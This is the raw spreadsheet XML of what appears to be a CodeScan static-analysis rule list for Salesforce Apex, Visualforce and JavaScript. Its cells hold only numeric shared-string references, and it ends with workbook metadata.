      <c r="A3" s="4" t="s">
        <v>1033</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>1034</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>1035</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4" s="4" t="s">
        <v>1460</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>28</v>
      </c>
      <c r="C4" s="4" t="s">
        <v>29</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E4" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5" s="4" t="s">
        <v>1036</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>1037</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>1038</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6" s="4" t="s">
        <v>1030</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>1031</v>
      </c>
      <c r="C6" s="4" t="s">
        <v>1032</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E6" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7" s="4" t="s">
        <v>1462</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>1461</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>1463</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8" s="4" t="s">
        <v>1467</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>1466</v>
      </c>
      <c r="C8" s="4" t="s">
        <v>1468</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E8" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9" s="4" t="s">
        <v>1025</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>1026</v>
      </c>
      <c r="C9" s="4" t="s">
        <v>1464</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E9" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10" s="4" t="s">
        <v>1023</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>1024</v>
      </c>
      <c r="C10" s="4" t="s">
        <v>1465</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E10" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11" s="4" t="s">
        <v>1027</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>1028</v>
      </c>
      <c r="C11" s="4" t="s">
        <v>1039</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E11" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12" s="4" t="s">
        <v>1019</v>
      </c>
      <c r="B12" s="4" t="s">
        <v>1020</v>
      </c>
      <c r="C12" s="4" t="s">
        <v>1021</v>
      </c>
      <c r="D12" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E12" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13" s="4" t="s">
        <v>1469</v>
      </c>
      <c r="B13" s="4" t="s">
        <v>44</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>1225</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E13" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14" s="4" t="s">
        <v>1470</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>41</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>42</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E14" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15" s="4" t="s">
        <v>1471</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>38</v>
      </c>
      <c r="C15" s="4" t="s">
        <v>39</v>
      </c>
      <c r="D15" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E15" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16" s="4" t="s">
        <v>1472</v>
      </c>
      <c r="B16" s="4" t="s">
        <v>35</v>
      </c>
      <c r="C16" s="4" t="s">
        <v>36</v>
      </c>
      <c r="D16" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E16" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17" s="4" t="s">
        <v>1473</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>32</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>33</v>
      </c>
      <c r="D17" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E17" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18" s="4" t="s">
        <v>1475</v>
      </c>
      <c r="B18" s="4" t="s">
        <v>81</v>
      </c>
      <c r="C18" s="8" t="s">
        <v>1474</v>
      </c>
      <c r="D18" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E18" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19" s="4" t="s">
        <v>1476</v>
      </c>
      <c r="B19" s="4" t="s">
        <v>1477</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>1478</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E19" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20" s="4" t="s">
        <v>1479</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>1480</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>1481</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E20" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A21" s="4" t="s">
        <v>1493</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>1494</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>1503</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>26</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>1022</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>18</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:F1"/>
  </mergeCell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CodeScan Rule List</vt:lpstr>
      <vt:lpstr>apex</vt:lpstr>
      <vt:lpstr>vf and lightning</vt:lpstr>
      <vt:lpstr>javascript (cs)</vt:lpstr>
      <vt:lpstr>javascript (sonar)</vt:lpstr>
      <vt:lpstr>security hotspots (apex)</vt:lpstr>
      <vt:lpstr>security hotspots (vf and l)</vt:lpstr>
      <vt:lpstr>salesforce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dc:description/>
  <cp:lastModifiedBy>Jeevan Mandal</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-20T04:36:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-13T11:09:06Z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